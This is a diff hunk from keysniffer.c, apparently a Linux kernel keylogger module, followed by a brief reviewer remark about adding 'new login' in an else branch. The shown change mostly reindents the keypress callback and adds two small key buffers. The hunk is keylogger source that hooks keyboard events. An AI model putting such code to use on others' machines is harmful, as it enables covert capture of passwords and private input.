keysniffer.c

```diff
@@ -104,33 +110,56 @@ static struct notifier_block keysniffer_blk = {
 
 /* Keypress callback */
 int keysniffer_cb(struct notifier_block *nblock,
-		unsigned long code,
-		void *_param)
+		  unsigned long code,
+		  void *_param)
 {
 	size_t len;
+	int max_len = sizeof(int) + 1;
+	char shift_mask[max_len];
+	char key[max_len];
 	struct keyboard_notifier_param *param = _param;
 	const char *pressed_key;
 
 	pr_debug("code: 0x%lx, down: 0x%x, shift: 0x%x, value: 0x%x\n",
-		code, param->down, param->shift, param->value);
+		 code, param->down, param->shift, param->value);
 
 	if (!(param->down))
 		return NOTIFY_OK;
 
 	if (param->value >= 0x1 && param->value <= 0x77) {
```

Comment:
Maybe we just need to put our new login in an else. It'll surely remain distinct.